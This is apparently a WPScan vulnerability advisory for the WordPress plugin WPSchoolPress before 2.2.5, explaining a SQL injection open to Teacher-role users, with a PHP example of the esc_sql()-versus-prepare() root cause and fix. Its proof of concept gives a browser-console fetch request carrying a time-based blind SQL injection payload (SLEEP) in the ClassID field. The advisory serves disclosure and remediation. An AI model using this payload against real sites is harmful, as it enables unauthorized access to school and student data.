WPVDB-ID: 59DD3917-01CB-479F-A557-021B2A5147DF
Source: wpvulndb
Author: Dao Xuan Hieu
History: Sep 25, 2023 - 12:00 a.m.
WPSchoolPress < 2.2.5 - Teacher+ SQLi

Published: 2023-09-25 00:00:00
Author: Dao Xuan Hieu
Source: wpscan.com
4
Tags: wordpress, sql injection, low-privilege users

EPSS: 0.001 (Low)
EPSS Percentile: 19.4%

Description

The plugin applies the WordPress esc_sql() function to a field that is not delimited by quotes, without first preparing the query with $wpdb->prepare(). Because esc_sql() only escapes quote characters, it does nothing to neutralise input placed into an unquoted (numeric) position, which leads to a SQL injection exploitable by relatively low-privilege users such as Teachers.
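The following is an added defensive illustration of the root cause stated in the description; it is not code from the WPSchoolPress plugin or from the advisory author. It shows why escaping with an esc_sql()-style function leaves an unquoted numeric field intact, and how a prepared statement with an integer placeholder closes the gap. The table name wp_example_students, the FakeWpdb stand-in for the WordPress $wpdb object, the esc_sql_like() approximation and the input value are all constructed for this example so that it runs under plain `php` without WordPress loaded; in a real plugin the equivalent call is the genuine $wpdb->prepare() with its %d placeholder.

```php
<?php
// Added example, not part of the WPSchoolPress plugin or the advisory.
// Stand-in for WordPress's $wpdb so this file runs without WordPress.
// Only the %d and %s placeholders of $wpdb->prepare() are emulated here.
class FakeWpdb {
    public function prepare(string $query, ...$args): string {
        $i = 0;
        return preg_replace_callback('/%[ds]/', function ($m) use (&$i, $args) {
            $v = $args[$i++];
            // %d coerces to an integer; %s quotes and escapes the string.
            return $m[0] === '%d'
                ? (string)(int)$v
                : "'" . addslashes((string)$v) . "'";
        }, $query);
    }
}

// Approximation of esc_sql(): escapes quotes and backslashes, nothing else.
function esc_sql_like(string $value): string {
    return addslashes($value);
}

// Vulnerable pattern described by the advisory: the value is escaped but
// placed into an unquoted numeric position, so escaping cannot help.
function query_escaped_unquoted(string $classId): string {
    return "SELECT * FROM wp_example_students WHERE cid = " . esc_sql_like($classId);
}

// Hardened form: the %d placeholder forces an integer, so the input can
// only ever contribute a number, never SQL syntax.
function query_prepared(FakeWpdb $wpdb, $classId): string {
    return $wpdb->prepare("SELECT * FROM wp_example_students WHERE cid = %d", $classId);
}

$wpdb  = new FakeWpdb();
$input = "0 AND 1=1"; // constructed non-numeric input (no quotes for esc_sql to act on)

echo query_escaped_unquoted($input), "\n"; // ... WHERE cid = 0 AND 1=1  (structure altered)
echo query_prepared($wpdb, $input), "\n";  // ... WHERE cid = 0          (input reduced to an int)
```

The first query shows the failure mode exactly as the description states it: esc_sql() has no quote characters to escape, so the appended condition survives untouched. The second shows the fix the description implies, preparing the query so that the field is typed as an integer before it reaches the database. Reviewing a plugin for this pattern means looking for string concatenation of esc_sql() output into a WHERE clause with no surrounding quotes and no prepare() call.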

PoC

1. Install the WPSchoolpress plugin and Import Demo Data.
2. Log in as a teacher.
3. Paste the following script in the browser's console, and notice it hangs for a couple of seconds, indicating the attack succeeded:

```javascript
await fetch("http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student", {
  "credentials": "include",
  "headers": {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
    "Content-Type": "application/x-www-form-urlencoded",
    "Upgrade-Insecure-Requests": "1"
  },
  "referrer": "http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student",
  "body": "ClassID=ClassID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))abc)",
  "method": "POST",
  "mode": "cors"
});
```

Affected software

CPE: (none listed)
Name: (none listed)
Operator: eq
Version: 2.2.5
